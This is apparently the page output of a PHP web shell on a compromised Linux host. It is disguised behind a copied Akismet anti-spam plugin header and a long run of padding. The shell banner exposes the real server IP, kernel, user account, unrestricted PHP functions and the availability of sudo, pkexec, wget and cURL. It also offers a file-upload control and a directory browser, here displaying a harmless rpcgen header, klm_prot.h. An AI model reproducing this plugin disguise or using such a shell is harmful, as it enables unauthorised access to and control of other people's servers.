#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/include/rpcsvc/ |
Upload File : |
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#ifndef _KLM_PROT_H_RPCGEN
#define _KLM_PROT_H_RPCGEN
#include <rpc/rpc.h>
#ifdef __cplusplus
extern "C" {
#endif
#define LM_MAXSTRLEN 1024
enum klm_stats {
klm_granted = 0,
klm_denied = 1,
klm_denied_nolocks = 2,
klm_working = 3,
};
typedef enum klm_stats klm_stats;
struct klm_lock {
char *server_name;
netobj fh;
int pid;
u_int l_offset;
u_int l_len;
};
typedef struct klm_lock klm_lock;
struct klm_holder {
bool_t exclusive;
int svid;
u_int l_offset;
u_int l_len;
};
typedef struct klm_holder klm_holder;
struct klm_stat {
klm_stats stat;
};
typedef struct klm_stat klm_stat;
struct klm_testrply {
klm_stats stat;
union {
struct klm_holder holder;
} klm_testrply_u;
};
typedef struct klm_testrply klm_testrply;
struct klm_lockargs {
bool_t block;
bool_t exclusive;
struct klm_lock alock;
};
typedef struct klm_lockargs klm_lockargs;
struct klm_testargs {
bool_t exclusive;
struct klm_lock alock;
};
typedef struct klm_testargs klm_testargs;
struct klm_unlockargs {
struct klm_lock alock;
};
typedef struct klm_unlockargs klm_unlockargs;
#define KLM_PROG 100020
#define KLM_VERS 1
#if defined(__STDC__) || defined(__cplusplus)
#define KLM_TEST 1
extern klm_testrply * klm_test_1(struct klm_testargs *, CLIENT *);
extern klm_testrply * klm_test_1_svc(struct klm_testargs *, struct svc_req *);
#define KLM_LOCK 2
extern klm_stat * klm_lock_1(struct klm_lockargs *, CLIENT *);
extern klm_stat * klm_lock_1_svc(struct klm_lockargs *, struct svc_req *);
#define KLM_CANCEL 3
extern klm_stat * klm_cancel_1(struct klm_lockargs *, CLIENT *);
extern klm_stat * klm_cancel_1_svc(struct klm_lockargs *, struct svc_req *);
#define KLM_UNLOCK 4
extern klm_stat * klm_unlock_1(struct klm_unlockargs *, CLIENT *);
extern klm_stat * klm_unlock_1_svc(struct klm_unlockargs *, struct svc_req *);
extern int klm_prog_1_freeresult (SVCXPRT *, xdrproc_t, caddr_t);
#else /* K&R C */
#define KLM_TEST 1
extern klm_testrply * klm_test_1();
extern klm_testrply * klm_test_1_svc();
#define KLM_LOCK 2
extern klm_stat * klm_lock_1();
extern klm_stat * klm_lock_1_svc();
#define KLM_CANCEL 3
extern klm_stat * klm_cancel_1();
extern klm_stat * klm_cancel_1_svc();
#define KLM_UNLOCK 4
extern klm_stat * klm_unlock_1();
extern klm_stat * klm_unlock_1_svc();
extern int klm_prog_1_freeresult ();
#endif /* K&R C */
/* the xdr functions */
#if defined(__STDC__) || defined(__cplusplus)
extern bool_t xdr_klm_stats (XDR *, klm_stats*);
extern bool_t xdr_klm_lock (XDR *, klm_lock*);
extern bool_t xdr_klm_holder (XDR *, klm_holder*);
extern bool_t xdr_klm_stat (XDR *, klm_stat*);
extern bool_t xdr_klm_testrply (XDR *, klm_testrply*);
extern bool_t xdr_klm_lockargs (XDR *, klm_lockargs*);
extern bool_t xdr_klm_testargs (XDR *, klm_testargs*);
extern bool_t xdr_klm_unlockargs (XDR *, klm_unlockargs*);
#else /* K&R C */
extern bool_t xdr_klm_stats ();
extern bool_t xdr_klm_lock ();
extern bool_t xdr_klm_holder ();
extern bool_t xdr_klm_stat ();
extern bool_t xdr_klm_testrply ();
extern bool_t xdr_klm_lockargs ();
extern bool_t xdr_klm_testargs ();
extern bool_t xdr_klm_unlockargs ();
#endif /* K&R C */
#ifdef __cplusplus
}
#endif
#endif /* !_KLM_PROT_H_RPCGEN */